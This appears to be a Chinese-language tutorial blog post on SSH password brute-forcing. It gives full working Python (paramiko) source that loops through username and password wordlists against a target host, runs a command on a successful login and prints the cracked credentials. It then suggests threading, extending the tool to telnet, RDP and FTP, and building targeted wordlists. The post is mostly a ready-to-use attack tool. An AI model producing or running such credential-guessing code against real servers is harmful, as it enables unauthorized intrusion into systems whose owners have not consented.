Linux服务器多数开放SSH登陆,渗透人员可以通过Metasploit、hydra等工具进行爆破,其实通过python实现ssh爆破非常简单,核心思想为:1.通过paramiko组件创建client;2.采用用户名及密码的传统认证方式;3.从字典表读取用户名及密码进行逐一连接认证。
一、源代码
#-*- coding:utf8 -*-
import paramiko
def crackhandle(client, ip, user, passwd, command):
try:
client.connect(ip, username=user, password=passwd) #连接
client.get_transport().banner_timeout = 2;
ssh_session = client.get_transport().open_session() #打开会话
if ssh_session.active:
ssh_session.exec_command(command) #执行命令
return ssh_session.recv(1024);
except Exception as e:
print(e);
print("username [%s] password [%s] fail" % (user,passwd));
return "";
def crack(ip,command):
passwordsList = open("/root/Desktop/pythonTest/password.txt");
usernamesList = open("/root/Desktop/pythonTest/username.txt");
passwords = passwordsList.readlines();
usernames = usernamesList.readlines();
client = paramiko.SSHClient();
client.set_missing_host_key_policy(paramiko.AutoAddPolicy());
switch = False;
for usuername in usernames:
username = usuername.strip();
for password in passwords:
password = password.strip();
commandRecv = crackhandle(client,ip,str(username),str(password),command);
if len(commandRecv)>1:
print("success userName is %s password is %s" % (username,password));
switch = True;
break;
if switch:
break;
crack("192.168.1.102","id");
#crackhandle("127.0.0.1","root","toor","id");
代码中我加了cmd的指令输出作为认证,其实没必要。
运行指令: python sshCrack.py
效果图如下,可以看到爆破成功。
二、下一步优化
在优化方面,可以分为三个层面。
1.性能 :与线程结合,加快爆破速度,提升爆破效率。
2.功能:形成爆破工具箱,可对ssh、telnet、3389、ftp等爆破代码进行整合,方便渗透人员便捷使用。业界已有非常出色的工具箱,通过自己动手编写代码了解原理和实现方式还是非常有必要的。
3.字典表:爆破是否成功在与字典表,足够丰富又具有针对性的字典表非常重要。